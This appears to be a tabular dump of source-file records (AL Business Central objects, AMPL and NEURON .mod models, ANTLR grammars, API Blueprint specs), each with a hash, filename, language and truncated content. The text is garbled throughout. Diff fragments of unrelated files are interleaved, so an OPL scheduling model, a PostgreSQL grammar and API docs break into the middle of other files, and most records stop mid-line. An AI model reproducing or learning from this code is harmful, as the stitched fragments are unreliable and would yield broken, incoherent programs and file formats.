- field(7; state; text[30]) - { - dataclassification = CustomerContent; - Caption = 'State'; - } - field(8; ""html_url""; text[250]) - { - dataclassification = CustomerContent; - Caption = 'URL'; - } -","238","1.1609756097560975","0.0","0.0" -"1856a59fd4e92ceefbc7425cca541404a78fc48c","ERMMIRReports.Codeunit.al",".al","AL","codeunit 134928 ""ERM MIR Reports"" + OBJECT-PROPERTIES + { + Date=22-02-18; + Time=12:00:00; + Version List=NAVW111.00.00.20783; + } + PROPERTIES + { + CaptionML=[DAN=Indekser forsikring; + ENU=Index Insurance]; + ProcessingOnly=Yes; + OnPreReport=BEGIN + IF PostingDate = 0D THEN + ERROR(Text000,InsuranceJnlLine.FIELDCAPTION(""Posting Date"")); + IF PostingDate <> NORMALDATE(PostingDate) THEN + ERROR(Text001); + IF IndexFigure = 100 THEN + ERROR(Text002); + IF IndexFigure <= 0 THEN + ERROR(Text003); + FASetup.GET; + FASetup.TESTFIELD(""Insurance Depr. Book""); + DeprBook.GET(FASetup.""Insurance Depr. Book""); + InsuranceJnlLine.LOCKTABLE; + FAJnlSetup.InsuranceJnlName(DeprBook,InsuranceJnlLine,NextLineNo); + NoSeries := FAJnlSetup.GetIns","221","1.0574162679425838","0.0","0.0" +"06bd073e935d334ab2b94555294572365caf25dd","TestReportLayoutSelection.Codeunit.al",".al","AL","codeunit 134605 ""Test Report Layout Selection"" { Subtype = Test; + EventSubscriberInstance = Manual; TestPermissions = Disabled; trigger OnRun() begin - // [FEATURE] [ERM] [Fin. Charge Memo] [Multiple Interest Rates] + // [FEATURE] [Report Layout] end; var - LibraryRandom: Codeunit ""Library - Random""; - LibraryERM: Codeunit ""Library - ERM""; - LibrarySales: Codeunit ""Library - Sales""; - LibraryVariableStorage: Codeunit ""Library - Variable Storage""; - LibraryReportDataset: Codeunit ""Library - Report Dataset""; - LibraryUtility: Codeunit ""Library - Utility""; - LibraryReportValidation: Codeunit ""Library - Report Validation""; - LibraryFinanceChargeMemo: Codeunit ""Library - Finance Charge Memo""; Assert: Codeunit Assert; - LibraryTestInitialize: Codeunit ""Library - Test Initialize""; - WrongRowErr: Label 'Line should be hidden.'; - IsInitialized: Boolean; - AmountNotFoundErr: Label 'Amount not found.'; + LibraryUtility: Codeunit ""Library - Utility""; + LibrarySales: Codeunit ""Library - Sales""; + LibraryPurchase: Codeunit ""Library - Purchase""; + LibrarySmtpMailHandler: Codeunit ""Library - SMTP Mail Handler""; + OneRecordWillBeSentQst: Label 'Only the first of the selected documents can be scheduled in the job queue.\\Do you want to continue?'; [Test] - [HandlerFunctions('FinChargeMemoRequestHandle","238","1.1609756097560975","0.0","0.0" -"03e8c76d4e24608521fca02d50433bdbebefe9fa","Pag-Ext37072402.PageExtansion45.al",".al","AL","pageextension 37072402 ""PageExtansion45"" extends ""Sales List"" -{ + [HandlerFunctions('NotificationHandler')] + [Scope('OnPrem')] + procedure TestNotificationBankInfoWhenPageOpens() var - AJShippingLine: Record ""AJE Shipping Log Line""; - LookupforAJShipping: Boolean; - - procedure SetLookupForAJShipping(AJShippingLine2: Record ""AJE Shipping Log Line"") + CustomReportLayouts: TestPage ""Custom Report Layouts""; begin - LookupforAJShipping := true; - AJShippingLine := AJShippingLine2; + CustomReportLayouts.OpenView(); + CustomReportLayouts.Close(); end; - trigger OnQueryClosePage(CloseAction: Action): Boolean - var - FromSalesHeader: Record ""Sales Header""; - AJShippingHeader: Record ""AJE Shipping Log""; - AJFillShippingLine: Codeunit ""AJ Fill Shipping Process""; - AJShippingCheck: Codeunit ""AJ Shipping Check""; - HaveBadDocuments: Boolean; - begin - if LookupforAJShipping and (CloseAction = Action::LookupOK) then begin - AJShippingHeader.Get(AJShippingLine.""Shipping No.""); - - FromSalesHeader.Copy(Rec); - CurrPage.SetSelectionFilter(FromSalesHeader); - HaveBadDocuments := false; - if FromSalesHeader.Fi","238","1.1609756097560975","0.0","0.0" -"1c0957fde93f66ed89c2d1cfa9df773753b224f6","Rep50080.INT_FixedAssetAnalysis2.al",".al","AL","report 50080 ""INT_Fixed Asset - Analysis 2"" -{ - DefaultLayout = RDLC; - RDLCLayout = 'rdlc/FixedAssetAnalysis.rdl'; - ApplicationArea = FixedAssets; - Caption = 'Fixed Asset Analysis 2'; - UsageCategory = ReportsAndAnalysis; - - dataset - { - dataitem(""Fixed Asset""; ""Fixed Asset"") - { - RequestFilterFields = ""No."", ""FA Class Code"", ""FA Subclass Code"", ""Budgeted Asset""; - column(MainHeadLineText; MainHeadLineText) - { - } - column(CompanyName; COMPANYPROPERTY.DisplayName) - { - } - column(TodayFormatted; Format(Today, 0, 4)) - { - } - column(DeprBookText; DeprBookText) - { - } - column(TblCptnFAFilter; TableCaption + ': ' + FAFilter) - { - } - column(FAFilter; FAFilter) - { - } - column(HeadLineText1; HeadLineText[1]) - { - } - column(G","238","1.1609756097560975","0.0","0.0" -"0dec547a6e3a8defa3a927375dc734b0c0143d5b","EmployeeList.Page.al",".al","AL","page 5201 ""Employee List"" + [Test] + [HandlerFunctions('JobQueueEntriesHandler,ReportIs","221","1.0574162679425838","0.0","0.0" +"06b226c82c3eb7780314417384141cb5ad249179","Pag50010.TimeSheetDetail.al",".al","AL","page 50010 ""Time Sheet Detail"" { - ApplicationArea = BasicHR; - Caption = 'Employees'; - CardPageID = ""Employee Card""; + // version EV + + // EVMC 150811 New Page + // EVST 150922 New Fields: ""Job Description"", ""Job Task Description"" + // EVST 150928 New Field: ""Time Sheet Description"" + // EVST 151005 New Field: ""Work Type Code"" + + Caption = 'Time Sheet Detail'; Editable = false; PageType = List; - SourceTable = Employee; - UsageCategory = Lists; + SourceTable = ""Time Sheet Detail""; layout { area(content) { - repeater(Control1) + repeater(Group) { - ShowCaption = false; - field(""No.""; ""No."") + field(""Time Sheet No.""; ""Time Sheet No."") { - ApplicationArea = BasicHR; - ToolTip = 'Specifies the number of the involved entry or record, according to the specified number series.'; + ApplicationArea = All; } - field(FullName; FullName) + field(""Time Sheet Line No.""; ""Time Sheet Line No."") { - ApplicationArea = BasicHR; - Caption = 'Full Name'; - ToolTip = 'Specifies the full name of the employee.'; - Visible = false; + ApplicationArea = All; } - field(""First Name""; ""First Name"") + field(Date; Date) { - ApplicationArea = BasicHR; - ","238","1.1609756097560975","0.0","0.0" -"055413942a656e897a4b2b35776ccf45d31c4a46","98005_na_ch.mod",".mod","AMPL","COMMENT -NA_CH.MOD - -c1 - c2 - c3 - c4 - c5 - o - is1 -| | | | | | -i1 - i2 - i3 - i4 - i5 - i6 - is2 - -SLOW - -6/18/2003 - -ENDCOMMENT - - - - -NEURON { - SUFFIX na_ch - USEION na READ ena WRITE ina - RANGE g, ina, gbar, a - GLOBAL Con, Coff, Oon, Ooff - GLOBAL a0, vha, vca - GLOBAL b0, vhb, vcb - GLOBAL g0 - GLOBAL d0 - GLOBAL aS1, aS2, bS -} - -UNITS { - (mV) = (millivolt) - (mA) = (milliamp) - (S) = (siemens) -} - -PARAMETER { - gbar = 1 (S/cm2) - - a0 = 37 (1/ms) : alpha - vha = 45 (mV) - vca = 40 (mV) - - b0 = 10 (1/ms) : beta - vhb = -50 (mV) - vcb = -20 (mV) - - g0 = 40 (1/ms) : gamma - - d0 = 30 (1/ms) : delta - - aS1 = 0.0025 (1/ms) - aS2 = 0.0002 (1/ms) - bS = 0.00017 (1/ms) - - Con = 0.001 (1/ms) - Coff = 0.1 (1/ms) - Oon = .7 (1/ms) - Ooff = 0.01 (1/ms) -} - -ASSIGNED { - v (mV) - ena (mV) - g (S/cm2) - ina (mA/cm2) - alpha (1/ms) - beta (1/ms) - gamma (1/ms) - delta (1/ms) - a -} - -STATE { - c1 : closed - c2 - c3 - c4 - c5 - ct : total closed - o","381","1.0214477211796247","0.2152230971128609","0.0" -"0ea2cfb68f8856c9a269b7d3aa597b899e2de118","main.mod",".mod","AMPL","param m, integer, >= 0; # qtd. de elementos -param n, integer, >= 0; # qtd. de subconjuntos -param V{1..n}; # custo de cada subconjunto -param R{1..m,1..n}, binary; # se elemento i está no subconjunto j -var S{1..n}, binary; # se subconjunto i faz parte da solução - -s.t. map{i in 1..m}: sum{j in 1..n} S[j]*R[i,j] >= 1; # cada elemento pelo menos em um subcojunto -minimize obj: sum{j in 1..n} S[j]*V[j]; #minimiza o custo da cobertura + ApplicationArea = All; + } + field(Type; Type) + { + ApplicationArea = All; + } + field(""Re","221","1.0574162679425838","0.0","0.0" +"06459fd8c3557e1d7c5070b3cf26d8335da9b599","BulkSMSSendMessage.al",".al","AL","page 70063001 BulkSMSSendMesage +{ + PageType = Card; + SourceTable = BulkSMSSetup; + + layout + { + area(content) + { + field(PhoneNo;PhoneNo) + { + CaptionML = ENU='Phone No.'; + } + field(MessageText;MessageText) + { + CaptionML = ENU='Message'; + MultiLine = true; + } + } + } + + actions + { + area(processing) + { + action(Setup) + { + CaptionML = ENU='Setup'; + Image = XMLSetup; + Promoted = true; + PromotedCategory = Process; + PromotedIsBig = true; + PromotedOnly = true; + RunObject = page BulkSMSSetup; + } + action(Send) + { + CaptionML = ENU='Send'; + Image = SendConfirmation; + Promoted = true; + PromotedCategory = Process; + ","221","1.0574162679425838","0.0","0.0" +"08c98d9003ed134f2aa7228fbcac360426e9ee6d","solvcoupe.mod",".mod","AMPL","#Données +param nbpostes; + +set T:=1..nbpostes; +set T2:=0..nbpostes; +param M:=25; + +param d{T}; +param h{T}; +param p{T}; +param f{T}; + +#Variables de décision +var x{T} >=0; +var y{T} >=0; +var s{T2}>=0; + +#Fonction objectif +minimize couts : sum{i in T} (y[i]*f[i] + x[i]*p[i] + h[i]*s[i]); + + +#Contraintes + +s.t. Equilibre{i in T} : (s[i-1]+x[i])=(s[i]+d[i]); +s.t. Activation{i in T}: y[i]*sum{j in i..nbpostes}d[j] >= x[i]; +s.t. contr1 :s[0]=0; +s.t. contr2 :s[nbpostes]=0; +s.t. coupe{t in T} : s[t-1] >= d[t]*(1-y[t]); + +#s.t. contr3 :y[1]=1; +#s.t. contr4 :y[2]=1; +#s.t. contr5 :y[3]=1; +#s.t. contr6 :y[4]=1; +#s.t. contr7 :y[5]=1; + +#Résolution +solve; + +#Affichange des res +display : s; +display : x; +display : y; +display : sum{i in T} (y[i]*f[i] + x[i]*p[i] + h[i]*s[i]); #fonction objectif à recopier + +data; + +param nbpostes:= 5; +param d:= 1 3 2 5 3 6 4 3 5 8; +param p:= 1 2 2 4 3 6 4 8 5 10 ; +param h:= 1 3 2 2 3 3 4 2 5 0; +param f:= 1 10 2 8 3 6 4 4 5 2; end; -","381","1.0214477211796247","0.2152230971128609","0.0" -"06eda9785f2c6990894a8698fca960b039c2ec32","newleak.mod",".mod","AMPL","TITLE Leak current including GABA_A receptor current - -UNITS { - (pA) = (picoamp) - (molar) = (1/liter) - (mV) = (millivolt) - (S) = (siemens) - (mA) = (milliamp) - (mM) = (millimolar) - F = (faraday) (coulomb) - R = (mole k) (mV-coulomb/degC) -} - - -INDEPENDENT {v FROM -100 TO 50 WITH 50 (mV)} - -NEURON { - SUFFIX leak - USEION ca WRITE ica - USEION na READ nai,ena WRITE ina - USEION k WRITE ik -: NTC cl valence should be -1 -: USEION cl WRITE icl VALENCE 1 - USEION cl WRITE icl VALENCE -1 - RANGE gcabar,ileak,ina,ica,ik,gnabar,gkbar,nai,ggabaa - + + + +","366","1.1296296296296295","0.20218579234972678","0.0" +"06fe08d2ff995fc6323491e7c6900c15345f45d2","ugc_681816257.mod",".mod","AMPL","name=""Extended Traits"" +archive=""C:\\Program Files (x86)\\Steam\\steamapps\\workshop\\content\\281990\\681816257/extended_traits.zip"" +tags={ + ""Balance"" + ""Species"" } +picture=""preview.jpg"" +remote_file_id=""681816257"" +supported_version=""2.0.*"" +","366","1.1296296296296295","0.20218579234972678","0.0" +"1c398323f1b353826b03e295e33e918f4fc3ff12","bd912.mod",".mod","AMPL","* BD912 +* bjt/pnp/bd912.mod -PARAMETER { - dt (ms) - ena (mV) - nai (mM) - celsius = 35 (degC) - gkbar = 5.5e-6 (S/cm2) - gnabar = 2.375e-6 (S/cm2) - gcabar = 0.0136e-6 (S/cm2) - ggabaa = 0.0e-6 (S/cm2) - eca = 120 (mV) - ecl = -70 (mV) - ek = -90.0 (mV) - nao = 145 (mM) - +.model BD912 PNP(IS=1n BF=3.500E+02 NF=1.009 VAF=1.000E+02 IKF=3.571E-01 ISE=2.107E-08 NE=1.897 BR=4.056 VAR=50 IKR=1.000E+09 ISC=0.000E+00 NC=2.000E+00 RB=1.297 IRB=1 RBM=1.297 RE=2.911E-02 RC=1.674E-01 CJE=1.400E-08 VJE=7.500E-01 MJE=3.300E-01 TF=2.767E-08 XTF=7.974E-01 VTF=9.990E+05 ITF=3.675E+01 +","366","1.1296296296296295","0.20218579234972678","0.0" +"0175986d1cadd33617ffa27662d594d3c0b4d616","alphaconv.mod",".mod","AMPL","NEURON { + POINT_PROCESS AlphaConvol + POINTER Vpre + RANGE e,i,k,g,tau_g,a + NONSPECIFIC_CURRENT i } -ASSIGNED { - ica (mA/cm2) - ina (mA/","381","1.0214477211796247","0.2152230971128609","0.0" -"17059338a535e739b2a39361f6759102536384f5","ejor-sched-model-1.mod",".mod","AMPL","/********************************************* - * OPL 12.3 Model - * Author: cgarcia - * Creation Date: Sep 23, 2016 at 1:48:23 PM - *********************************************/ +PARAMETER { + e = 0 (mV) + k = 5e-5 (uS) + tau_a = 1e-6 (ms) +} + +ASSIGNED { + v (mV) + Vpre (mV) + i (nA) + g +} + +STATE { a (microsiemens) } + +INITIAL { + a = 0 +} + +BREAKPOINT { + SOLVE state METHOD cnexp + g = k*(Vpre+65) + i = g^2*(v-e) + a^2*(v+65) +} + +DERIVATIVE state { + a' = tau_a*(Vpre+65) +} +","366","1.1296296296296295","0.20218579234972678","0.0" +"18bf90698d60d245838b6aec329fa46c26e9d37c","c_rbf.mod",".mod","AMPL","svm_type c_svc +kernel_type rbf +gamma 0.111 +nr_class 2 +total_sv 12014 +rho 8.52292 +label 1 0 +nr_sv 6007 6007 +SV +1 1:0.739726 2:0.054795 3:0.027397 5:0.024361517 6:0.01960802 7:0.017039762 +1 1:0.775194 2:0.023256 3:0.031008 5:0.019068776 6:0.0076740077 7:0.018481756 +1 1:0.769585 2:0.011521 3:0.029954 7:0.016620768 +1 1:0.786624 2:0.015924 3:0.022293 5:0.01651186 6:0.0066450066 7:0.017535341 +1 1:0.769231 2:0.014514 3:0.059507 5:0.029042983 7:0.020443201 +1 1:0.681081 2:0.081081 3:0.048649 5:0.014171127 6:0.045627046 7:0.017336848 +1 1:0.779685 2:0.007153 3:0.032904 5:0.019434049 7:0.01673122 +1 1:0.765625 2:0.015625 3:0.054688 7:0.017625762 +1 1:0.755102 2:0.013605 3:0.027211 5:0.037369731 7:0.016550524 +1 1:0.691824 2:0.012579 3:0.113208 5:0.035498636 7:0.016106768 +1 1:0.768627 2:0.017647 3:0.021569 5:0.01669077 7:0.016021043 +1 1:0.777108 2:0.016064 3:0.01004 5:0.011882576 7:0.015366341 +1 1:0.762295 2:0.02459 3:0.045082 5:0.02900571 7:0.019267293 +1 1:0.76259 2:0.014388 3:0.035971 5","366","1.1296296296296295","0.20218579234972678","0.0" +"0c647688004631bc57e8bb32e65ffb58daf11632","vhdl.g4",".g4","ANTLR","// +// Copyright (C) 2010-2014 Denis Gavrish +// +// This program is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// This program is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . +// - int numResourceTypes = ...; - int numResources = ...; - int numTasks = ...; - - range K = 1..numResourceTypes; - range R = 1..numResources; - range T = 1..numTasks; - int r[R][K] = ...; - int D[K][T] = ...; - float d[K][K][T] = ...; - float S[K][T] = ...; - int y[R][T] = ...; - float mP[R][T] = ...; - float mM[R][T] = ...; - int A[R][T] = ...; - int u[R][T][T] = ...; - - dvar int+ x[R][T] in 0..1; - dvar int+ wP[R][T] in 0..1; - dvar int+ wM[R][T] in 0..1; +grammar vhdl; + +ABS: A B S; +ACCESS : A C C E S S; +ACROSS : A C R O S S; +AFTER : A F T E R; +ALIAS : A L I A S; +ALL : A L L; +AND : A N D; +ARCHITECTURE : A R C H I T E C T U R E; +ARRAY : A R R A Y; +ASSERT : A S S E R T; +ATTRIBUTE : A T T R I B U T E; +BEGIN : B E G I N; +BLOCK : B L O C K; +BODY :","149","0.8975903614457831","0.0","0.0" +"0ffbcd491fb81058d3e94faec9669fcb261ed85b","ILPMLgrammar2.g4",".g4","ANTLR","grammar ILPMLgrammar2; + +@header { + package antlr4; +} + +// Redéfinition des programmes +prog returns [com.paracamplus.ilp2.interfaces.IASTprogram node] + : (defs+=globalFunDef ';'?)* (exprs+=expr ';'?) * EOF + ; + +// Fonction globale +globalFunDef returns [com.paracamplus.ilp2.interfaces.IASTfunctionDefinition node] + : 'function' name=IDENT '(' vars+=IDENT? (',' vars+=IDENT)* ')' + body=expr + ; - minimize (sum (j in K) sum (k in T) S[j][k] * D[j][k]) - - (sum (i in R) sum(j in K) sum (k in T) S[j][k] * r[i][j] * x[i][k]) + - (sum (i in R) sum (k in T) ((mP[i][k] * wP[i][k]) + (mM[i][k] * wM[i][k]))); - - constraints { - forall (i in R, k in T) { - x[i][k] <= A[i][k]; // Constraint 2 - x[i][k] - y[i][k] <= wP[i][k]; // Constraint ","381","1.0214477211796247","0.2152230971128609","0.0" -"0dfbd59b3eb9ee729968187f85d30315ed4fddfb","quadrature.mod",".mod","AMPL","GFORTRAN module version '6' created from quadrature3.f90 on Wed May 7 15:49:42 2014 -MD5:94ec23e659d011e5e447734ef5e5c54d -- If you edit this, you'll get what you deserve. - -(() () () () () () () () () () () () () () () () () () () () () () () -() () () ()) - -() - -() - -() - -() - -() - -(2 'error_table' 'quadrature' 'error_table' 1 ((PROCEDURE UNKNOWN-INTENT -MODULE-PROC DECL UNKNOWN 0 0 SUBROUTINE ALWAYS_EXPLICIT) (UNKNOWN 0 0 0 -UNKNOWN ()) 3 0 (4 5 6 7 8) () 0 () () () 0 0) -9 'pi' 'quadrature' 'pi' 1 ((PARAMETER UNKNOWN-INTENT UNKNOWN-PROC -UNKNOWN IMPLICIT-SAVE 0 0) (REAL 4 0 0 REAL ()) 0 0 () (CONSTANT (REAL 4 -0 0 REAL ()) 0 '0.3243f6c@1') () 0 () () () 0 0) -10 'quadrature' 'quadrature' 'quadrature' 1 ((MODULE UNKNOWN-INTENT -UNKNOWN-PROC UNKNOWN UNKNOWN 0 0) (UNKNOWN 0 0 0 UNKNOWN ()) 0 0 () () 0 -() () () 0 0) -11 'trapezoid' 'quadrature' 'trapezoid' 1 ((PROCEDURE UNKNOWN-INTENT -MODULE-PROC DECL UNKNOWN 0 0 FUNCTION) (REAL 8 0 0 REAL ()) 12 0 (13 14 -15 16) () 11 () () () 0 0) -13 'f' '' 'f' 12 ((","381","1.0214477211796247","0.2152230971128609","0.0" -"1872a9ed1d30f3132c450453352c9356094ff6df","Bnf.g4",".g4","ANTLR","grammar Bnf; - -bnf - : bnfrule* EOF ; -bnfrule - : nt '=' alternatives ';' ; -alternatives - : sequence ('|' sequence)* ; -sequence - : element+ ; -element - : nt - | keyword - | type - | optional - | zeroormore - | precedence ; -optional - : '[' alternatives ']' ; -zeroormore - : '{' alternatives '}' ; -precedence - : '(' alternatives ')' ; -nt - : NT ; -keyword - : KEYWORD ; -type - : TYPE ; -NT - : '<'('a'..'z')('a'..'z'|'A'..'Z')+'>' ; -KEYWORD - : '\''('a'..'z'|'A'..'Z')+'\'' ; -TYPE - : ('a'..'z'|'A'..'Z')+ ; -","149","1.1037037037037036","0.0","0.0" -"07abed6e0a1784d2bfa00058fd71b739c995c6cb","LITTLE.g4",".g4","ANTLR","grammar LITTLE; - -tokens: .* EOF; - -COMMENT: '--'~[\n]*'\n' -> skip; - -STRINGLITERAL: '""'~[""]*'""'; -INTLITERAL: [0-9]+; -FLOATLITERAL: ([0-9]+'.'[0-9]+)|'.'[0-9]+; - -/*Keywords are now given their own dedicated token:*/ - -PROGRAM: 'PROGRAM'; -BEGIN: 'BEGIN'; -ENDIF: 'ENDIF'; -ENDWHILE: 'ENDWHILE'; -END: 'END'; -FUNCTION: 'FUNCTION'; -READ: 'READ'; -WRITE: 'WRITE'; -IF: 'IF'; -ELSE: 'ELSE'; -WHILE: 'WHILE'; -CONTINUE: 'CONTINUE'; -BREAK: 'BREAK'; -RETURN: 'RETURN'; -INT: 'INT'; -VOID: 'VOID'; -STRING: 'STRING'; -FLOAT: 'FLOAT'; - -/* Remove operatorts, let parser take care of them */ -/*OPERATOR: ':='|'!='|'<='|'>='|'+'|'-'|'*'|'='|'<'|'>'|'/'|','|'('|')'|';';*/ - -IDENTIFIER: [A-z][A-z0-9]*; - -WHITESPACE: [ \n\r\t] -> skip; - -program: PROGRAM id BEGIN pgm_body END; -id: IDENTIFIER; -pgm_body: decl func_declarations; -decl: string_decl decl | var_decl decl | ; - -string_decl: STRING id ':=' str ';'; -str: STRINGLITERAL; - -var_decl: var_type id_list ';'; -var_type: FLOAT | INT; -any_type: var_type | VOID; -","149","1.1037037037037036","0.0","0.0" -"1edadccf9a287a9e116a221b1df3f2e474589bda","test1.g4",".g4","ANTLR","grammar test1; - -example: - left=integer '*' right=integer #integerExample - | left=string '+' right=string #stringExample - ; +// Expressions enrichies +expr returns [com.paracamplus.ilp1.interfaces.IASTexpression node] +// expressions de la grammaire précédente + : '(' exprs+=expr (';'? exprs+=expr)* ';'? ')' # Sequence + | fun=expr '(' args+=expr? (',' args+=expr)* ')' # Invocation + | op=('-' | '!') arg=expr # Unary + | arg1=expr op=('*' | '/' | '%') arg2=expr # Binary + | arg1=expr op=('+' | '-') arg2=expr # Binary + | arg1=expr op=('<' | '<=' | '>' | '>=') arg2=expr # Binary + | arg1=expr op=('==' | '!=') arg2=expr # Binary + | arg1=expr op='&' arg2=expr # Binary + | arg1=expr op=(","149","0.8975903614457831","0.0","0.0" +"15acc19776e6d6435c8b3e32b64832218e0e6137","Java.g4",".g4","ANTLR","/* + [The ""BSD licence""] + Copyright (c) 2013 Terence Parr, Sam Harwell + All rights reserved. + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + 1. Redistributions of source example must retain the above copyright + notice, this list of conditions and the following disclaimer. + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + 3. The name of the author may not be used to endorse or promote products + derived from this software without specific prior written permission. + THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES + OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. + IN NO EVENT SHALL THE AUTHO","149","0.8975903614457831","0.0","0.0" +"0e20a64fca576904ebeb7eefd75df849a04c34b3","MySQLStatement.g4",".g4","ANTLR","/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the ""License""); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an ""AS IS"" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ -integer: IDENTIFIER; -string: INTEGER; +grammar MySQLStatement; -STRING: [a-zA-Z]; -INTEGER: [a-zA-Z];","149","1.1037037037037036","0.0","0.0" -"1364a6befa33dca7dc094293fb3192fe7b5b83b3","PostgreSQLBase.g4",".g4","ANTLR","grammar PostgreSQLBase; +import Symbol, Comments, DMLStatement, DDLStatement, TCLStatement, DCLStatement, DALStatement, RLStatement; -import PostgreSQLKeyword, DataType, Keyword, Symbol, BaseRule; +execute + : ( dalStatement | dclStatement | ddlStatement | dm","149","0.8975903614457831","0.0","0.0" +"05caa7bacea1d82c46203ff3a508ccfdce5bb32e","CobolLexer.g4",".g4","ANTLR","/* + Copyright (C) 2017, Ulrich Wolffgang + All rights reserved. -columnDefinition - : columnName dataType collateClause? columnConstraint* - ; - -dataType - : typeName intervalFields? dataTypeLength? (WITHOUT TIME ZONE | WITH TIME ZONE)? (LBT_ RBT_)* - | ID - ; - -typeName - : DOUBLE PRECISION | CHARACTER VARYING? | BIT VARYING? | ID - ; - -typeNames - : typeName (COMMA typeName)* - ; - -intervalFields - : intervalField (TO intervalField)? - ; - -intervalField - : YEAR - | MONTH - | DAY - | HOUR - | MINUTE - | SECOND - ; - -collateClause - : COLLATE collationName - ; + Portions copyright (C) 2019 - 2022, Craig Schneiderwent. All rights reserved. + + This software may be modified and distributed under the terms + of the MIT license. See the LICENSE file for details. +*/ + +/* + COBOL Lexer for ANTLR4 + + This is a COBOL Lexer, which started life as part of the COBOL parser at + https://github.com/uwol/proleap-cobol-parser. + + Moved to a separate lexer grammar by Craig Schneiderwent. +*/ + +lexer grammar CobolLexer; + +@lexer::members { + /* + This Boolean is set to true to make the ANTLR testrig work. The + file being parsed is rewritten without columns 73 - 80 if it is + being processed via an application. Under those circumstances, + the lexing code must set this variable to false. + */ + public static Boolean testRig = true; + + /* + The token PICTURE has a different meaning in the CURRENCY SIGN + clause of the Special-Names paragraph than it does in the + Data Division. + */ + pu","149","0.8975903614457831","0.0","0.0" +"0dcdd41dc74c14a5c760509cd6321b02aa85b747","examplecode.apib",".apib","API Blueprint","FORMAT: 1A + +# Example code for using The Grid API + +[Example code directory on Github](https://github.com/the-grid/apidocs/tree/master/code-examples) + +# Dart + + +## Authenticate and get user information + + + + + + + + +# Python + +## Share a file + + + + + + + +# CoffeeScript + +## Share a URL + + + + +## Share a file + + + + + ","47","0.8703703703703703","0.0","0.0" +"08fe66423841d1a6143789f8487c56e8fb14f3e2","ip-protocol.struct.apib",".apib","API Blueprint","## IpProtocol (string) +","47","0.8703703703703703","0.0","0.0" +"034c9527807f0c00cb06692c12b3a82876a72fa5","customer.apib",".apib","API Blueprint","FORMAT: 1A +HOST: http://polls.apiblueprint.org/customer + +# Customer + +Customer is the API as defined for the Customer Microservice that is used for the soaring through the clouds demo sequel. + +## Profile [/profile?email={email}] + +The profile consists of a number of parts: Customer, Address, Phonenumber, Payment details and Preferences + +### findCustomerByUsername [GET] + ++ Request -usingIndexType: - USING (BTREE | HASH | GIST | SPGIST | GIN | BRIN) - ; + + Parameters + + email: 'john.doe@gmail.com' (string) + ++ Response 200 (application/json) + + + Attributes (Customer) + +### Signup [POST] +Sign up as a new customer + ++ Request (application/json) -columnConstraint - : constraintClause? columnConstraintOption constraintOptionalParam - ; + + Attributes (Customer) -constraintClause - : CONSTRAINT constraintName - ; ++ Response 201 (application/json) -columnConstraintOption - : NOT? NULL - | checkOption - | DEFAULT defaultExpr - | GENERATED (ALWAY","149","1.1037037037037036","0.0","0.0" -"03b456e90b6dc864f48e29017e7984550ce75e1f","RML.g4",".g4","ANTLR","grammar RML; - -// generated parser will end up in this package -@header { package rml.parser; } - -// a specification is made up of event type declarations followed by equations -// ignore unused warning: this is the entry point -specification: eventTypeDeclaration* equation+ ; - -// either derive an event type from existing ones or define a eventExpression for JSON events -eventTypeDeclaration: declared=evtype NOT? 'matches' parents+=evtype ('|' parents+=evtype)* ('with' dataExp)? ';' # derivedEvtypeDecl - | evtype NOT? 'matches' eventExp ('with' dataExp)? ';' # directEvtypeDecl - ; - -// event types are parametric -evtype: evtypeId ('(' evtypeParam (',' evtypeParam)* ')')? ; -evtypeParam: evtypeVar # evtypeVarParam - | dataExp # evtypeDataExpParam - | eventExp # evtypeEventExpParam - ; - -// patterns for JSON events from the underlying event domain -// basically JSON objects with '|' -eventExp: eventExp ('|' eventExp) # patternEventExp - ","149","1.1037037037037036","0.0","0.0" -"0d5c8c2dfed61a20afeb4e977253f7e3243b0b54","apiary.apib",".apib","API Blueprint","FORMAT: 1A -HOST: https://api.profiles.crowdflower.com - -# Contributor Profiles API -Contributor Profiles API lets you interact with contributor consequences. - -## Versioning -The current version of the API is **v1**. You must specify the version in the path to the various resources described below. - -# Group Personal Profiles -A personal profile is identified by an **akon user id**. Ideally, one personal profile corresponds to one person. - -## Personal Profiles Collection [/personal_profiles] -### List all Profiles [GET] -+ Response 200 (application/json) + + Body + + { + ""message"":""your account has been created, please check your email for account verification"" + } + + - [{ - ""id"": 1, ""title"": ""Jogging in park"" - }, { - ""id"": 2, ""title"": ""Pick-up posters from post-office"" - }] -### Create a Note [POST] + +## Profile details [/profile/{_id}] + +### Get Profile (GET) +Get the profile details of an existing customer + + Request (application/json) - { ""title"": ""Buy cheese and bread for breakfast."" } + + Paramete","47","0.8703703703703703","0.0","0.0" +"11b7572c3761902a5cef16406ee5531a4285c5d2","apiary.apib",".apib","API Blueprint","FORMAT: 1A +HOST: loaclhost:8090 -+ Response 201 (application/json) +# Feeds_UI_RESTful_API - { ""id"": 3, ""title"": ""Buy cheese and bread for breakfast."" } +This document defines RESTful API that provide standard interfaces of data transformation between Feeds_UI backend and frontend. -## Note [/notes/{id}] -A single Note object with all its details +## Authentication [/auth] -+ Parameters - ","56","0.9824561403508771","0.0","0.0" -"18ffdfa948e4a456b9d9f597e42dfcdbe7ef0d33","index.apib",".apib","API Blueprint","# Group Reference Reads -","56","0.9824561403508771","0.0","0.0" 